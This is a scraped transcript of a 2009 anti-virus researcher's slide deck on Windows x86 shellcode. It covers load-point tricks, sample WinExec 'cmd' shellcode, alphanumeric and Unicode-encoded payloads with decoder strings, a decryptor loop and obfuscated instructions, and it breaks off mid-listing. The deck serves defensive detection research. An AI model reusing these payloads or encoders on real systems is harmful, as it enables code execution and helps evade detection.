1 / 56

Shellgames

Shellgames. Peter Ferrie Senior Anti-virus Researcher 4 February, 2009. 1. Outside the Shell. Gaining control Buffer overflow Double-free Function-pointer hijack NULL-pointer access (rare) And others. 2. Peter Ferrie, Microsoft Corporation. Outside the Shell. Types of shellcode

zita
Download Presentation

Shellgames

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Shellgames Peter Ferrie Senior Anti-virus Researcher 4 February, 2009 1

  2. Outside the Shell Gaining control Buffer overflow Double-free Function-pointer hijack NULL-pointer access (rare) And others 2 Peter Ferrie, Microsoft Corporation

  3. Outside the Shell • Types of shellcode • Stack-based • Heap-based • Other memory locations 3 Peter Ferrie, Microsoft Corporation

  4. Inside the Shell Finding the load-point CALL->POP Often to earlier memory location to avoid zeroes in the code FPU Many FPU instructions store EIP in the Last Instruction Pointer field All except FNINIT, FNCLEX, FLDCW, FNSTCW, FNSTSW, FNSTENV, FLDENV, FN/XSAVE, F[X]RSTOR SEH Write to a known "safe" memory location Raise exception Exception address is the load-point Don't care 4 Peter Ferrie, Microsoft Corporation

  5. CALL->POP Method l1: EB xx JMP SHORT l3l2: 5x POP reg32 ...l3: E8 xx FF FF FF CALL NEAR l2 Alternative for larger shellcode (> 129 bytes) l1: EB 02 JMP SHORT l3l2: EB 05 JMP SHORT l4l3: E8 F9 FF FF FF CALL NEAR l2l4: 5x POP reg32 ... 5 Peter Ferrie, Microsoft Corporation

  6. FPU Method l1:[DB E3 FNINIT] (optional) Dx xx [FPU instruction] D9 74 24 F4 FNSTENV BYTE PTR SS:[ESP - 0C] 5x POP reg32 ... 6 Peter Ferrie, Microsoft Corporation

  7. FPU Method (cont.) Metasploit framework calls these "safe": d9 c0 - c7 - fld st(0), st(i) d9 c8 - cf - fxch st(0), st(i) d9 d0 - fnop d9 e1 - fabs st(0) d9 e5 - fxam st(0) d9 e8 - fld1 st(0) d9 e9 - fldl2t st(0) d9 ea - fldl2e st(0) d9 eb - fldpi st(0) d9 ec - fldlg2 st(0) d9 ed - fldln2 st(0) d9 ee - fldz st(0) 7 Peter Ferrie, Microsoft Corporation

  8. FPU Method (cont.) Metasploit framework calls these "safe": d9 f6 - fdecstp d9 f7 - fincstp da c0 - c7 - fcmovb st(0), st(i) (p2+) da c8 - cf - fcmove st(0), st(i) (p2+) da d0 - d7 - fcmovbe st(0), st(i) (p2+) da d8 - df - fcmovu st(0), st(i) (p2+) db c0 - c7 - fcmovnb st(0), st(i) (p2+) db c8 - cf - fcmovne st(0), st(i) (p2+) db d0 - d7 - fcmovnbe st(0), st(i) (p2+) db d8 - df - fcmovnu st(0), st(i) (p2+) dd c0 - c7 - ffree st(i) 8 Peter Ferrie, Microsoft Corporation

  9. FPU Method (cont.) There are others: d9 e0 - fchs st(0) d9 e4 - ftst st(0) dd c8 - cf - fxch st(i), st(0) df c0 - c7 - ffree st(i) df c8 - cf - fxch st(i), st(0) 9 Peter Ferrie, Microsoft Corporation

  10. FPU Method (cont.) Accessing the Last Instruction Pointer field FSTENV Uses 28 bytes of memory FSAVE Uses 108 bytes of memory Not supported by Metasploit framework FXSAVE Uses 512 bytes of memory Requires oword-alignment Not supported by Metasploit framework 10 Peter Ferrie, Microsoft Corporation

  11. SEH Method 33 C0 XOR EAX, EAX64 8B 78 30 MOV EDI, DWORD PTR FS:[EAX + 30]8B 7F 10 MOV EDI, DWORD PTR DS:[EDI + 10]83 C7 78 ADD EDI, +7857 PUSH EDI57 PUSH EDI64 89 20 MOV DWORD PTR FS:[EAX], ESPB8 58 58 5C 59 MOV EAX, 595C5858AB STOS DWORD PTR ES:[EDI]B8 8B 40 0C 40 MOV EAX, 400C408BAB STOS DWORD PTR ES:[EDI]B8 40 FF E0 00 MOV EAX, 00E0FF40AB STOS DWORD PTR ES:[EDI]0F 0B UD2 11 Peter Ferrie, Microsoft Corporation

  12. Don't Care Method Most commonly ESP-relative Stack-based shellcode ESP used as direct memory pointer Usually not encoded 12 Peter Ferrie, Microsoft Corporation

  13. Example Shellcode Plain binary 64 67 A1 30 00 MOV EAX, DWORD PTR FS:[0030] 8B 78 0C MOV EDI, DWORD PTR DS:[EAX + 0C] 8B 77 1C MOV ESI, DWORD PTR DS:[EDI + 1C] AD LODS DWORD PTR DS:[ESI] 8B 78 08 MOV EDI, DWORD PTR DS:[EAX + 08] 8B 77 3C MOV ESI, DWORD PTR DS:[EDI + 3C] 8B 74 3E 78 MOV ESI, DWORD PTR DS:[EDI + ESI + 78] 8B 5C 3E 20 MOV EBX, DWORD PTR DS:[EDI + ESI + 20] 03 DF ADD EBX, EDI 33 ED XOR EBP, EBPl1: 45 INC EBP 8B 14 AB MOV EDX, DWORD PTR SS:[EBP*4 + EBX] 81 3C 3A 57 69 6E 45 CMP DWORD PTR DS:[EDI + EDX], "EniW" 75 F3 JNE l1 8B 74 3E 1C MOV ESI, DWORD PTR DS:[EDI + ESI + 1C] 03 F7 ADD ESI, EDI 03 3C AE ADD EDI, DWORD PTR DS:[EBP*4 + ESI] 68 63 6D 64 00 PUSH "dmc" 8B F4 MOV ESI, ESP 6A 00 PUSH +00 56 PUSH ESI FF D7 CALL NEAR PTR EDI 13 Peter Ferrie, Microsoft Corporation

  14. Example Shellcode Plain binary 68 63 6D 64 00 PUSH "dmc" 8B FC MOV EDI, ESP 33 ED XOR EBP, EBP 55 PUSH EBP 57 PUSH EDI 64 8B 7D 30 MOV EDI, DWORD PTR FS:[EBP + 30] 8B 7F 0C MOV EDI, DWORD PTR DS:[EDI + 0C] 8B 77 1C MOV ESI, DWORD PTR DS:[EDI + 1C] AD LODS DWORD PTR DS:[ESI] 8B 78 08 MOV EDI, DWORD PTR DS:[EAX + 08] 8B 77 3C MOV ESI, DWORD PTR DS:[EDI + 3C] 8B 74 3E 78 MOV ESI, DWORD PTR DS:[EDI + ESI + 78] 8B 5C 3E 20 MOV EBX, DWORD PTR DS:[EDI + ESI + 20] 03 DF ADD EBX, EDIl1: 45 INC EBP 8B 14 AB MOV EDX, DWORD PTR SS:[EBP*4 + EBX] 81 3C 3A 57 69 6E 45 CMP DWORD PTR DS:[EDI + EDX], "EniW" 75 F3 JNE l1 8B 74 3E 1C MOV ESI, DWORD PTR DS:[EDI + ESI + 1C] 03 F7 ADD ESI, EDI 03 3C AE ADD EDI, DWORD PTR DS:[EBP*4 + ESI] FF D7 CALL NEAR PTR EDI 14 Peter Ferrie, Microsoft Corporation

  15. Example Shellcode Binary without zeroes 68 78 63 6D 64 PUSH "dmcx" 8B FC MOV EDI, ESP 47 INC EDI 33 ED XOR EBP, EBP 55 PUSH EBP 57 PUSH EDI 64 8B 7D 30 MOV EDI, DWORD PTR FS:[EBP + 30] 8B 7F 0C MOV EDI, DWORD PTR DS:[EDI + 0C] 8B 77 1C MOV ESI, DWORD PTR DS:[EDI + 1C] AD LODS DWORD PTR DS:[ESI] 8B 78 08 MOV EDI, DWORD PTR DS:[EAX + 08] 8B 77 3C MOV ESI, DWORD PTR DS:[EDI + 3C] 8B 74 3E 78 MOV ESI, DWORD PTR DS:[EDI + ESI + 78] 8B 5C 3E 20 MOV EBX, DWORD PTR DS:[EDI + ESI + 20] 03 DF ADD EBX, EDIl1: 45 INC EBP 8B 14 AB MOV EDX, DWORD PTR SS:[EBP*4 + EBX] 81 3C 3A 57 69 6E 45 CMP DWORD PTR DS:[EDI + EDX], "EniW" 75 F3 JNE l1 8B 74 3E 1C MOV ESI, DWORD PTR DS:[EDI + ESI + 1C] 03 F7 ADD ESI, EDI 03 3C AE ADD EDI, DWORD PTR DS:[EBP*4 + ESI] FF D7 CALL NEAR PTR EDI 15 Peter Ferrie, Microsoft Corporation

  16. Example Shellcode Alphanumeric ASCII Mixed-case 56 PUSH ESI33 34 64 XOR ESI, DWORD PTR SS:[ESP]4E DEC ESI 6A 41 PUSH +41 58 POP EAX34 65 XOR AL, 6550 PUSH EAX33 34 64 XOR ESI, DWORD PTR SS:[ESP]l1: 46 INC ESI 6B 44 71 65 30 IMUL EAX, DWORD PTR DS:[ESI*2 + ECX + 65], +3032 44 71 66 XOR AL, BYTE PTR DS:[ESI*2 + ECX + 66]30 44 31 41 XOR BYTE PTR DS:[ESI + ECX + 41], AL 75 [JNE l1] 45 45 [encoded F0] 16 Peter Ferrie, Microsoft Corporation

  17. Example Shellcode Alphanumeric ASCII Mixed-case Decoder V34dNjAX4eP34dFkDqe02Dqf0D1AuEE Our shellcode PvJOGBHAP0PwHIBWPMCKPGPLCJHCP1PJCLBGPqHHGoPnGoCKBpAMPjPKElPcCLGEHAPWCwHCAKPjBFBABFBbBzDcCuP3PQAoPHEEPsAMCsPcDGA5BCGmBoGmA7CXEHA1BpGNENDGPW 17 Peter Ferrie, Microsoft Corporation

  18. Example Shellcode Alphanumeric ASCII Lower-case 6A 33 PUSH +3331 34 64 XOR DWORD PTR SS:[ESP], ESI 33 34 64 XOR ESI, DWORD PTR SS:[ESP] 6A 71 PUSH +7133 34 64 XOR ESI, DWORD PTR SS:[ESP]6A 6E PUSH +6E33 34 64 XOR ESI, DWORD PTR SS:[ESP]31 34 31 XOR DWORD PTR DS:[ESI + ECX], ESI 31 71 31 XOR DWORD PTR DS:[ECX + 31], ESI 31 71 34 XOR DWORD PTR DS:[ECX + 34], ESI 31 71 36 XOR DWORD PTR DS:[ECX + 36], ESI 6A 33 PUSH +33 31 34 64 XOR DWORD PTR SS:[ESP], ESI 33 34 64 XOR ESI, DWORD PTR SS:[ESP] 6A 30 PUSH +30 33 34 64 XOR ESI, DWORD PTR SS:[ESP]l1: 6B 68 71 34 30 [IMUL EAX, DWORD PTR DS:[ESI*2 + ECX + 34], +30]32 68 71 35 [XOR AL, BYTE PTR DS:[ESI*2 + ECX + 35]]6A [INC ESI]30 68 31 36 [XOR BYTE PTR DS:[ESI + ECX + 36], AL] 75 [JNE l1] 35 35 [encoded F0] 18 Peter Ferrie, Microsoft Corporation

  19. Example Shellcode Alphanumeric ASCII Lower-case Decoder j314d34djq34djn34d1411q11q41q6j314d34dj034dkhq402hq5j0h16u55 Our shellcode a6en228n2qrbdy1w0bdy160nno8o11093l6g1n8o2m2o6nok02206o7k4p129l0u827w574w1k2k0921110w2x513t1r200s0h57012n5n155r0b136l2s1l264r5h0v7p0nnm3p0w 19 Peter Ferrie, Microsoft Corporation

  20. Example Shellcode Alphanumeric ASCII Upper-case 37 AAA * 16 51 PUSH ECX 5A POP EDX 56 PUSH ESI 54 PUSH ESP 58 POP EAX 33 30 XOR ESI, DWORD PTR DS:[EAX] 56 PUSH ESI 58 POP EAX34 41 XOR AL, 4150 PUSH EAX 30 41 33 XOR BYTE PTR DS:[ECX + 33], AL 48 DEC EAX 48 DEC EAX 30 41 30 XOR BYTE PTR DS:[ECX + 30], AL 30 41 42 XOR BYTE PTR DS:[ECX + 42], ALl1: 41 INC ECX 41 INC ECX 42 INC EDX 54 41 41 51 [IMUL EAX, DWORD PTR DS:[ECX + 41], +10] 32 41 42 XOR AL, BYTE PTR DS:[ECX + 42]32 42 42 XOR AL, BYTE PTR DS:[EDX + 42]30 42 42 XOR BYTE PTR DS:[EDX + 42], AL 58 POP EAX 50 PUSH EAX 38 41 43 CMP BYTE PTR DS:[ECX + 43], AL 4A [JNE l1]4A 49 [encoded E9] 20 Peter Ferrie, Microsoft Corporation

  21. Example Shellcode Alphanumeric ASCII Upper-case Decoder 7777777777777777777777QZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJI IMUL 10 method 21 Peter Ferrie, Microsoft Corporation

  22. Example Shellcode Alphanumeric ASCII Upper-case (improved) 56 PUSH ESI 54 PUSH ESP 5A POP EDX 33 32 XOR ESI, DWORD PTR DS:[EDX] 58 POP EAX 56 PUSH ESI 58 POP EAX 48 DEC EAX34 50 XOR AL, 5034 43 XOR AL, 4350 PUSH EAX 56 PUSH ESI 58 POP EAX 33 32 XOR ESI, DWORD PTR DS:[EDX] 56 PUSH ESI 5A POP EDX34 31 XOR AL, 3130 44 31 34 XOR BYTE PTR DS:[ESI + ECX + 34], AL 30 44 31 41 XOR BYTE PTR DS:[ESI + ECX + 41], ALl1: 42 INC EDX 46 INC ESI5A 44 51 54 30 [IMUL EAX, DWORD PTR DS:[EDX*2 + ECX + 54], +30] 32 44 51 55 XOR AL, BYTE PTR DS:[EDX*2 + ECX + 55] 30 44 31 41 XOR BYTE PTR DS:[ESI + ECX + 41], AL44 [JNE l1]33 4C [encoded EF] 22 Peter Ferrie, Microsoft Corporation

  23. Example Shellcode Alphanumeric ASCII Upper-case (improved) Decoder VTZ32XVXH4P4CPVX32VZ410D140D1AFBZDQT02DQU0D1AD3L Our shellcode AO5N2K5N0112500J0B5K0F2MOO5N0H08510G1N5NMOLNMN5I7A1A6O064Q13351E5C2A4Z5A1KLK69KLMP182Z5O3U096P2I0J500BLMNO15321UKN0L02KL0W5H511GLP1S5LNE0A 23 Peter Ferrie, Microsoft Corporation

  24. Example Shellcode Alphanumeric Unicode Mixed-case 34 00 XOR AL, 00 * 27 6A 00 PUSH +00 58 00 41 00 POP EAX + NOP 51 00 41 00 PUSH ECX + NOP 44 00 41 00 INC ESP + NOP 5A 00 41 00 POP EDX + NOP 42 00 41 00 INC EDX + NOP 52 00 41 00 PUSH EDX + NOP 4C 00 41 00 DEC ESP + NOP 59 00 41 00 POP ECX + NOP 49 00 41 00 DEC ECX + NOP 51 00 41 00 PUSH ECX + NOP 49 00 41 00 DEC ECX + NOP 51 00 41 00 PUSH ECX + NOP 49 00 41 00 DEC ECX + NOP 68 00 41 00 41 PUSH 41004100 00 41 00 ADD BYTE PTR DS:[ECX + 00], AL (NOP) 5A POP EDX 00 31 ADD BYTE PTR DS:[ECX], DH00 41 00 ADD BYTE PTR DS:[ECX + 00], AL (NOP)49 00 41 00 DEC ECX + NOP49 00 41 00 DEC ECX + NOP 4A DEC EDX 00 31 ADD BYTE PTR DS:[ECX], DH 00 31 ADD BYTE PTR DS:[ECX], DH 00 41 00 ADD BYTE PTR DS:[ECX + 00], AL (NOP) 49 00 41 00 DEC ECX + NOP 49 00 41 00 DEC ECX + NOP 24 Peter Ferrie, Microsoft Corporation

  25. Example Shellcode Alphanumeric Unicode Mixed-case (cont.) 42 00 41 00 INC EDX + NOP 42 00 41 00 INC EDX + NOP 42 INC EDX 00 51 00 ADD BYTE PTR DS:[ECX + 00], DL 49 DEC ECX 00 31 ADD BYTE PTR DS:[ECX], DH00 41 00 ADD BYTE PTR DS:[ECX + 00], AL (NOP)49 DEC ECX 00 51 00 ADD BYTE PTR DS:[ECX + 00], DL 49 00 41 00 DEC ECX + NOP 49 DEC ECX 00 51 00 ADD BYTE PTR DS:[ECX + 00], DL 49 DEC ECX 00 31 ADD BYTE PTR DS:[ECX], DH 00 31 ADD BYTE PTR DS:[ECX], DH 00 31 ADD BYTE PTR DS:[ECX], DH00 41 00 ADD BYTE PTR DS:[ECX + 00], AL (NOP) 49 00 41 00 DEC ECX + NOP 4A DEC EDX 00 51 00 ADD BYTE PTR DS:[ECX + 00], DL 59 00 41 00 POP ECX + NOP 5A POP EDX 00 42 00 ADD BYTE PTR DS:[EDX + 00], ALl1: 41 INC ECX 00 42 00 ADD BYTE PTR DS:[EDX + 00], AL 41 INC ECX 00 42 00 ADD BYTE PTR DS:[EDX + 00], AL 41 INC ECX 25 Peter Ferrie, Microsoft Corporation

  26. Example Shellcode Alphanumeric Unicode Mixed-case (cont.) 00 42 00 ADD BYTE PTR DS:[EDX + 00], AL 41 INC ECX 00 42 00 ADD BYTE PTR DS:[EDX + 00], AL 6B 00 4D [IMUL EAX, DWORD PTR DS:[ECX], +10]00 41 00 [ADD AL, BYTE PTR DS:[ECX + 02]]47 00 [MOV BYTE PTR DS:[EDX], AL] 42 INC EDX 00 39 00 [CMP DWORD PTR DS:[ECX], +41] 75 00 [JNE l1]34 00 XOR AL, 004A 00 42 00 [encoded E2] 26 Peter Ferrie, Microsoft Corporation

  27. Example Shellcode Alphanumeric Unicode Mixed-case Decoder 444444444444444444444444444444444444444jXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JB Our shellcode OCKOBDDKCONPDKCOLLDKCGMLFMDKCHLHDKCGOLDKCDONCHDKQLONMPLCIOOCJMOUDKMDFKCQOLOJQGBIBNPECEKCDKCDONMLLCKGLCOLFNOCJMQEBHCHBCBMBDDKKDOVQEQFKOIGA 27 Peter Ferrie, Microsoft Corporation

  28. Example Shellcode Alphanumeric Unicode Lower-case None is known to exist 28 Peter Ferrie, Microsoft Corporation

  29. Example Shellcode Alphanumeric Unicode Upper-case 34 00 XOR AL, 00 * 0E 51 00 41 00 PUSH ECX + NOP 44 00 41 00 INC ESP + NOP 58 00 41 00 POP EAX + NOP 5A 00 41 00 POP EDX + NOP 50 00 41 00 PUSH EAX + NOP 33 00 XOR EAX, DWORD PTR DS:[EAX] 51 00 41 00 PUSH ECX + NOP 44 00 41 00 INC ESP + NOP 5A 00 41 00 POP EDX + NOP 42 00 41 00 INC EDX + NOP 52 00 41 00 PUSH EDX + NOP 4C 00 41 00 DEC ESP + NOP 59 00 41 00 POP ECX + NOP 49 00 41 00 DEC ECX + NOP 51 00 41 00 PUSH ECX + NOP 49 00 41 00 DEC ECX + NOP 51 00 41 00 PUSH ECX + NOP 50 00 41 00 PUSH EAX + NOP 35 00 41 00 41 XOR EAX, 41004100 00 41 00 ADD BYTE PTR DS:[ECX + 00], AL (NOP) 50 00 41 00 PUSH EAX + NOP 5A POP EDX 00 31 ADD BYTE PTR DS:[ECX], DH00 41 00 ADD BYTE PTR DS:[ECX + 00], AL (NOP)49 DEC ECX 00 31 ADD BYTE PTR DS:[ECX], DH00 41 00 ADD BYTE PTR DS:[ECX + 00], AL (NOP) 29 Peter Ferrie, Microsoft Corporation

  30. Example Shellcode Alphanumeric Unicode Upper-case (cont.) 49 00 41 00 DEC ECX + NOP 49 00 41 00 DEC ECX + NOP 4A DEC EDX 00 31 ADD BYTE PTR DS:[ECX], DH 00 31 ADD BYTE PTR DS:[ECX], DH00 41 00 ADD BYTE PTR DS:[ECX + 00], AL (NOP)49 00 41 00 DEC ECX + NOP 49 00 41 00 DEC ECX + NOP 58 00 41 00 POP EAX + NOP 35 00 38 00 41 XOR EAX, 4100380000 41 00 ADD BYTE PTR DS:[ECX + 00], AL (NOP)50 00 41 00 PUSH EAX + NOP 5A 00 41 00 POP EDX + NOP 42 00 41 00 INC EDX + NOP 42 INC EDX 00 51 00 ADD BYTE PTR DS:[ECX + 00], DL 49 DEC ECX 00 31 ADD BYTE PTR DS:[ECX], DH00 41 00 ADD BYTE PTR DS:[ECX + 00], AL (NOP)49 DEC ECX 00 51 00 ADD BYTE PTR DS:[ECX + 00], DL 49 00 41 00 DEC ECX + NOP 49 DEC ECX 00 51 00 ADD BYTE PTR DS:[ECX + 00], DL 49 DEC ECX 00 31 ADD BYTE PTR DS:[ECX], DH 00 31 ADD BYTE PTR DS:[ECX], DH 00 31 ADD BYTE PTR DS:[ECX], DH 30 Peter Ferrie, Microsoft Corporation

  31. Example Shellcode Alphanumeric Unicode Upper-case (cont.) 00 31 ADD BYTE PTR DS:[ECX], DH00 41 00 ADD BYTE PTR DS:[ECX + 00], AL (NOP)49 00 41 00 DEC ECX + NOP 4A DEC EDX 00 51 00 ADD BYTE PTR DS:[ECX + 00], DL 49 DEC ECX 00 31 ADD BYTE PTR DS:[ECX], DH00 41 00 ADD BYTE PTR DS:[ECX + 00], AL (NOP)59 00 41 00 POP ECX + NOP 5A POP EDX 00 42 00 ADD BYTE PTR DS:[EDX + 00], ALl1: 41 INC ECX 00 42 00 ADD BYTE PTR DS:[EDX + 00], AL 41 INC ECX 00 42 00 ADD BYTE PTR DS:[EDX + 00], AL 41 INC ECX 00 42 00 ADD BYTE PTR DS:[EDX + 00], AL 41 INC ECX 00 42 00 ADD BYTE PTR DS:[EDX + 00], AL 33 00 30 [IMUL EAX, DWORD PTR DS:[ECX], +10]00 41 00 [ADD AL, BYTE PTR DS:[ECX + 02]]50 00 [MOV BYTE PTR DS:[EDX], AL] 42 INC EDX 00 39 00 [CMP BYTE PTR DS:[ECX], 41] 34 00 [JNE l1]34 00 XOR AL, 004A 00 42 00 [encoded E2] 31 Peter Ferrie, Microsoft Corporation

  32. Example Shellcode Alphanumeric Unicode Upper-case Decoder 44444444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB Our shellcode OCKOBDDKCONPDKCOLLDKCGMLFMDKCHLHDKCGOLDKCDONCHDKQLONMPLCIOOCJMOUDKMDFKCQOLOJQGBIBNPECEKCDKCDONMLLCKGLCOLFNOCJMQEBHCHBCBMBDDKKDOVQEQFKOIGA 32 Peter Ferrie, Microsoft Corporation

  33. Example Shellcode Fewest unique bytes Recent challenge run by MSEC Run calc.exe on all major Windows platforms Restricted register set, too void __declspec(naked) __cdecl run(void *buffer){ __asm { push ebp mov esp, ebp xor eax, eax xor ecx, ecx cdq xor ebx, ebx xor esi, esi xor edi, edi jmp dword ptr [ebp + 8] }} 33 Peter Ferrie, Microsoft Corporation

  34. Example Shellcode Fewest unique bytes Recent challenge run by MSEC Run calc.exe on all major Windows platforms Restricted register set, too void __declspec(naked) __cdecl run(void *buffer){ __asm { push ebp mov esp, ebp xor eax, eax xor ecx, ecx cdq xor ebx, ebx xor esi, esi xor edi, edi jmp dword ptr [ebp + 8] }} It can be done using only 3 bytes 34 Peter Ferrie, Microsoft Corporation

  35. Example Shellcode Fewest unique bytes Recent challenge run by MSEC Run calc.exe on all major Windows platforms Restricted register set, too void __declspec(naked) __cdecl run(void *buffer){ __asm { push ebp mov esp, ebp xor eax, eax xor ecx, ecx cdq xor ebx, ebx xor esi, esi xor edi, edi jmp dword ptr [ebp + 8] }} It can be done using only 3 bytes Or even 2 bytes but platform-specific 35 Peter Ferrie, Microsoft Corporation

  36. Common Characteristics Get load point Initialise registers Read from memory Decrypt Write to memory Adjust pointer Loop 36 Peter Ferrie, Microsoft Corporation

  37. Common Characteristics Example decryptor l1: EB 1D JMP SHORT l4l2: 5A POP EDX 52 PUSH EDX 31 C9 XOR ECX, ECX 66 B9 34 12 MOV CX, 1234 B8 BC 9A 78 56 MOV EAX, 56789ABCl3: 8B 1A MOV EBX, DWORD PTR DS:[EDX] 31 C3 XOR EBX, EAX 01 C3 ADD EBX, EAX 31 C3 XOR EBX, EAX 89 1A MOV DWORD PTR DS:[EDX], EBX 83 C2 04 ADD EDX, +04 E2 F1 LOOPD l3 C3 RETDl4: E8 DE FF FF FF CALL NEAR l2 37 Peter Ferrie, Microsoft Corporation

  38. Common Characteristics Get load-point l1: EB 1D JMP SHORT l4l2: 5A POP EDX 52 PUSH EDX 31 C9 XOR ECX, ECX 66 B9 34 12 MOV CX, 1234 B8 BC 9A 78 56 MOV EAX, 56789ABCl3: 8B 1A MOV EBX, DWORD PTR DS:[EDX] 31 C3 XOR EBX, EAX 01 C3 ADD EBX, EAX 31 C3 XOR EBX, EAX 89 1A MOV DWORD PTR DS:[EDX], EBX 83 C2 04 ADD EDX, +04 E2 F1 LOOPD l3 C3 RETDl4: E8 DE FF FF FF CALL NEAR l2 38 Peter Ferrie, Microsoft Corporation

  39. Common Characteristics Initialise registers l1: EB 1D JMP SHORT l4l2: 5A POP EDX 52 PUSH EDX 31 C9 XOR ECX, ECX 66 B9 34 12 MOV CX, 1234 B8 BC 9A 78 56 MOV EAX, 56789ABCl3: 8B 1A MOV EBX, DWORD PTR DS:[EDX] 31 C3 XOR EBX, EAX 01 C3 ADD EBX, EAX 31 C3 XOR EBX, EAX 89 1A MOV DWORD PTR DS:[EDX], EBX 83 C2 04 ADD EDX, +04 E2 F1 LOOPD l3 C3 RETDl4: E8 DE FF FF FF CALL NEAR l2 39 Peter Ferrie, Microsoft Corporation

  40. Common Characteristics Read from memory l1: EB 1D JMP SHORT l4l2: 5A POP EDX 52 PUSH EDX 31 C9 XOR ECX, ECX 66 B9 34 12 MOV CX, 1234 B8 BC 9A 78 56 MOV EAX, 56789ABCl3: 8B 1A MOV EBX, DWORD PTR DS:[EDX] 31 C3 XOR EBX, EAX 01 C3 ADD EBX, EAX 31 C3 XOR EBX, EAX 89 1A MOV DWORD PTR DS:[EDX], EBX 83 C2 04 ADD EDX, +04 E2 F1 LOOPD l3 C3 RETDl4: E8 DE FF FF FF CALL NEAR l2 40 Peter Ferrie, Microsoft Corporation

  41. Common Characteristics Decrypt l1: EB 1D JMP SHORT l4l2: 5A POP EDX 52 PUSH EDX 31 C9 XOR ECX, ECX 66 B9 34 12 MOV CX, 1234 B8 BC 9A 78 56 MOV EAX, 56789ABCl3: 8B 1A MOV EBX, DWORD PTR DS:[EDX] 31 C3 XOR EBX, EAX 01 C3 ADD EBX, EAX 31 C3 XOR EBX, EAX 89 1A MOV DWORD PTR DS:[EDX], EBX 83 C2 04 ADD EDX, +04 E2 F1 LOOPD l3 C3 RETDl4: E8 DE FF FF FF CALL NEAR l2 41 Peter Ferrie, Microsoft Corporation

  42. Common Characteristics Write to memory l1: EB 1D JMP SHORT l4l2: 5A POP EDX 52 PUSH EDX 31 C9 XOR ECX, ECX 66 B9 34 12 MOV CX, 1234 B8 BC 9A 78 56 MOV EAX, 56789ABCl3: 8B 1A MOV EBX, DWORD PTR DS:[EDX] 31 C3 XOR EBX, EAX 01 C3 ADD EBX, EAX 31 C3 XOR EBX, EAX 89 1A MOV DWORD PTR DS:[EDX], EBX 83 C2 04 ADD EDX, +04 E2 F1 LOOPD l3 C3 RETDl4: E8 DE FF FF FF CALL NEAR l2 42 Peter Ferrie, Microsoft Corporation

  43. Common Characteristics Adjust pointer l1: EB 1D JMP SHORT l4l2: 5A POP EDX 52 PUSH EDX 31 C9 XOR ECX, ECX 66 B9 34 12 MOV CX, 1234 B8 BC 9A 78 56 MOV EAX, 56789ABCl3: 8B 1A MOV EBX, DWORD PTR DS:[EDX] 31 C3 XOR EBX, EAX 01 C3 ADD EBX, EAX 31 C3 XOR EBX, EAX 89 1A MOV DWORD PTR DS:[EDX], EBX 83 C2 04 ADD EDX, +04 E2 F1 LOOPD l3 C3 RETDl4: E8 DE FF FF FF CALL NEAR l2 43 Peter Ferrie, Microsoft Corporation

  44. Common Characteristics Loop l1: EB 1D JMP SHORT l4l2: 5A POP EDX 52 PUSH EDX 31 C9 XOR ECX, ECX 66 B9 34 12 MOV CX, 1234 B8 BC 9A 78 56 MOV EAX, 56789ABCl3: 8B 1A MOV EBX, DWORD PTR DS:[EDX] 31 C3 XOR EBX, EAX 01 C3 ADD EBX, EAX 31 C3 XOR EBX, EAX 89 1A MOV DWORD PTR DS:[EDX], EBX 83 C2 04 ADD EDX, +04 E2 F1 LOOPD l3 C3 RETDl4: E8 DE FF FF FF CALL NEAR l2 44 Peter Ferrie, Microsoft Corporation

  45. Counter-examples Initialise registers indirectly Common direct ways MOV PUSH/POP Arithmetic is indirect ADC/ADD AND OR SBB/SUB XOR 45 Peter Ferrie, Microsoft Corporation

  46. Counter-examples Set EAX to 0 81 C8 FF FF FF FF OR EAX, FFFFFFFF81 C0 01 00 00 00 ADD EAX, 00000001 Can be applied to individual bits 81 C8 81 81 81 81 OR EAX, 8181818181 C8 42 42 42 42 OR EAX, 4242424281 E8 C3 C3 C3 C3 SUB EAX, C3C3C3C381 C8 3C 3C 3C 3C OR EAX, 3C3C3C3C81 C0 C4 C3 C3 C3 ADD EAX, C3C3C3C4 Can be hidden among do-nothing instructions Can also be made polymorphic… 46 Peter Ferrie, Microsoft Corporation

  47. Counter-examples 81 D1 66 2B DE A4 ADC ECX, A4DE2B66 81 EE 3D 00 21 50 SUB ESI, 5021003D81 D0 11 B2 0F 31 ADC EAX, 310FB211 81 FE A6 27 3F A1 CMP ESI, A13F27A681 D6 A1 22 1B 56 ADC ESI, 561B22A1 81 FA 83 F4 C7 CA CMP EDX, CAC7F48381 E7 01 D3 9E 07 AND EDI, 079ED301 81 F7 4B C4 BB B5 XOR EDI, B5BBC44B81 E6 C9 D9 BA D7 AND ESI, D7BAD9C9 81 E8 12 06 CA 44 SUB EAX, 44CA061281 D8 FE 65 85 5F SBB EAX, 5F8565FE 81 F8 EE 86 A0 6F CMP EAX, 6FA086EE81 CA 35 D2 6A 39 OR EDX, 396AD235 81 CF 24 F8 14 0E OR EDI, 0E14F82481 DB BD BE 56 67 SBB EBX, 6756BEBD 81 F0 EA F7 12 2F XOR EAX, 2F12F7EA81 F2 04 BA 53 B6 XOR EDX, B653BA04 81 ED 14 91 E6 40 SUB EBP, 40E6911481 FE AC CA 8F D3 CMP ESI, D38FCAAC 81 EF CD AD 49 28 SUB EDI, 2849ADCD81 E7 BE 8E 44 EE AND EDI, EE448EBE 81 D9 14 F4 A8 BD SBB ECX, BDA8F41481 FD 46 38 7E F1 CMP EBP, F17E3846 81 FA 2E A3 97 EB CMP EDX, EB97A32E81 CF E1 58 31 00 OR EDI, 003158E1 81 C6 CB 9D 67 88 ADD ESI, 88679DCB81 C5 24 F9 4A 9A ADD EBP, 9A4AF924 81 EE 53 54 A4 70 SUB ESI, 70A4545381 C3 0F 9C 25 90 ADD EBX, 90259C0F 81 F7 C2 0E 16 8B XOR EDI, 8B160EC281 E2 CC 85 24 94 AND EDX, 942485CC 81 EE 2B 65 F2 85 